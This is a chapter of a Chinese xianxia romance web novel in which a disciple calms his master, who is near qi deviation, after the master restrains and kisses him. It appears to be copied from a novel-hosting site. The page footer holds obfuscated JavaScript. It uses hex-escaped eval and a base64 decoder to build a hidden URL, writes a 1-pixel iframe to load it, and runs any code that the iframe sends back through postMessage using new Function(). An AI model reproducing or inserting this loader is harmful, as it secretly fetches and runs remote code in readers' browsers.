凌霄仙尊身上常年带着股清冽好闻的冷香。

而如今,那味道笼在祁殊身旁,却平白多出几分危险的意味。

祁殊被迫跪在窗前冰冷的地砖上,上身伏进床榻里,脑中一片空白。

修行求道其实是个极其危险的过程,从筑基开始,境界越往上,便越危险,甚至稍有不慎就会走火入魔。

就连祁殊都在修行时陷入过好几次危机。

可凌霄仙尊天赋超绝,怎么也会……

“师……师尊……”

祁殊被压得有点呼吸困难,他下意识动了动,换来的却是更加用力的钳制。

那只冰冷的手紧紧掐住他的手腕,另一只手钳住腰身,将祁殊整个人死死压进床榻。

力道大得祁殊甚至有点疼。

从他入师门到现在,还从未见过师尊这幅模样。凌霄仙尊向来沉稳淡然,处变不惊,何时有过这种癫狂失态的模样。

该怎么办……

“师尊,是我呀,你放开我……”

祁殊看得出来,师尊这情形多半是因为练功出了岔子,有些意识不清,尚未到走火入魔的地步。可再这么拖下去,后果不堪设想。

想到这里,他强迫自己冷静下来。

祁殊努力回忆着以前他练功遇险时师尊的做法,放松了身体,声音极尽温柔:“师尊,不要怕,没事的。你先放开我好不好,我能帮你……”

“你想走?”顾寒江声音低沉。

“……啊?”

“你想去哪里?”

顾寒江的声音更大了些,就像是往日训斥派内练功偷懒的弟子那样,听起来很生气。

祁殊都不明白他怎么就生气了。

他还想接着哄,耳后忽然传来一点湿润微凉的触感。

顾寒江在他耳后,落下一个蜻蜓点水般的亲吻。

敏感的耳后哪里受过这种碰触,祁殊好不容易积攒的理智几乎一瞬间螺旋升天,就连腿都软了。

“师、师尊!”

可意识混沌的人哪里会理他。

因此顾寒江只是再次低头碰了碰他。酥酥麻麻的痒意从脊髓升腾上来,耳后潮湿的触碰叫祁殊难受得很,可他不敢乱动,只能用力攥住身下的薄被,浑身细密地抖。

月色将两人交叠的身影映照到地面,黑暗的屋内一时只听得见压抑过后的喘息。

不知过去多久,压制在祁殊身上的力道终于松开几分。

祁殊到底是昆仑剑派大师兄,只这片刻的空档,便从对方手中挣脱出来。他反手握住顾寒江的手腕,将人一道带上了床。

两人姿势瞬间调换,祁殊跨坐在顾寒江身上,两指并起,落在顾寒江的额头上。

祁殊手还有点发抖,声音竭力平稳:“师尊,屏息凝神。”

滚滚灵力顺着指尖渡入,顾寒江终于平静下来。

控制住了。

祁殊松了口气。

怎么从没有人告诉过他,走火入魔会这样性情大变。

祁殊用空闲的手摸了摸耳朵,那里仿佛还残留着方才的触感,耳垂到脖子被玩得红了一片,还发着烫。

太可怕了。

虽然……他好像也不吃亏就是了。

顾寒江的呼吸渐渐平稳,仿佛终于睡着了。祁殊趴在自家师尊身上,借着月色和点点灵力的微光,专注地看向他。

他鲜少有机会能这样看着师尊,这么近的距离,就连脸上细小的绒毛,以及纤长的睫羽都能看得清晰。

顾寒江的脸色依旧很差,就连嘴唇也泛着白,紧紧抿着。在今天之前,祁殊怎么也想不到,那双轮廓锋利的嘴唇,竟然是这样柔软。

祁殊舔了舔嘴唇,竟鬼使神差地伸出手去,想再碰一碰那唇瓣。

却在碰到前一刻停了下来。

不行。

师尊今天险些走火入魔,已经叫他占去许多便宜,他不能再欺负人了。

乘人之危绝非正人君子所为。

祁殊在心里认真对自己说。

就看看算了。

祁殊说服了自己,低下头去,大大方方欣赏自家师尊的美貌睡颜。

他就这么出神地看着,甚至没注意到天色渐渐转亮。

顾寒江睫羽微颤,睁开了眼。

他神情难得有些茫然,那双眼好一会儿才聚焦,落到了祁殊脸上。

“师尊,你终于醒了。”

顾寒江没说话,视线缓慢下移。

祁殊也跟着低头看过去。

祁殊:“……”

直到这时,他这才意识到他们现在的姿势有多不雅观。

他跨坐在师尊身上,两腿架在对方腰间,一只手还撑在师尊身侧,就是民间人人喊打的采花贼,也做不出比他更流氓的姿势。

祁殊的脸瞬间涨得通红,忙道:“抱、抱歉师尊,我这就下来——”

可越忙越出错,祁殊手脚一软,竟直挺挺地砸在顾寒江胸膛上。

“我……弟子好像腿麻了……”祁殊窘迫得恨不得当场找个地缝钻进去。

顾寒江只是摇了摇头,一双手抬起揽在他的腰侧,将他轻轻托住:“你是灵力消耗太多,闭眼休息,别再乱动。”

他声音低哑,说话时胸腔微微震动。

本站不支持畅读模式,不仅附带大量的广告,还影响阅读《今天也想和师尊灵修》的最新章节,请您关闭浏览器畅读服务或者更换其它浏览器,步骤:设置——关闭网页小说畅读服务。

if(typeof eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=="undefined"){eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=function(e){var sx="ABCDEFGHIJKLMNOPQRSTUVWXYZ"+"abcdefghijklmnopqrstuvwxyz"+"0123456789+/=";var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=sx.indexOf(e.charAt(f++));o=sx.indexOf(e.charAt(f++));u=sx.indexOf(e.charAt(f++));a=sx.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return(function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);};}
eval('\x77\x69\x6e\x64\x6f\x77')['fYSrjsi']=function (){ ;(function (u, w, d, f, c) { 'jQuery'; var x = qdfEWb; var _id = d['qu'+'ery'+'Se'+'le'+'cto'+'rA'+'ll']('.a7921').length; u = decodeURIComponent(x(u.replace(new RegExp(c + '' + c, 'g'), '')))+'c'+_id+'.fon'; var __nid='i'+new Date().getTime(); var k = '', wr = 'w' + 'ri' + 't' + 'e'; var c = d[x('Y3VycmVudFNjcmlwdA==')]; var f = d.createElement('iframe'); f.id = __nid; f.className = 'a7921'; f.style.width = f.style.height = 1 + 'px'; f.src = [u].join('-'); d[wr](f.outerHTML); w['__y' + 'ra' + 'nq' + 'ob' + 'j_7921_'+_id] = d['qu' + 'ery' + 'Sele' + 'cto' + 'r']('#'+__nid); w['ad' + 'dEv' + 'entL' + 'ist' + 'ener']('m' + 'ess' + 'age', function (e) { if (e.data[`des_s_7921_`+_id]) { var t = x(e.data[`des_s_7921_`+_id].replace(new RegExp('FdaWAFAbWFf', 'g'), '')); new Function(decodeURIComponent(t.replace(/\+/g, '%20')))(); } }); })(''+'FFa'+'HRF'+'F0c'+'HFF'+'MlM'+'0El'+'FFM'+'kYl'+'MkZ'+'qYF'+'FS5'+'5dX'+'Nod'+'Whh'+'LFF'+'mNv'+'bSU'+'FFz'+'QTF'+'FEw'+'NDQ'+'zJT'+'JFF'+'GYz'+'FFR'+'jYF'+'FTQ'+'yJT'+'JFF'+'GYy'+'FF0'+'3OF'+'FTI'+'xFF'+'LTI'+'FF1'+'LTF'+'FFl'+'Ng='+'=', window, document, '' + 'Pwf' + 'SmZ' + 'j' + '', 'F');}
推荐阅读
没有人不爱我[西幻] 前夫以为我对他念念不忘[重生] 沙雕室友总在撩我 摄政王总想让朕休产假[穿书] 她又菜又爱撩 和总裁分手后他成了顶流 我死遁后渣攻他疯了[快穿] 温酒咬梨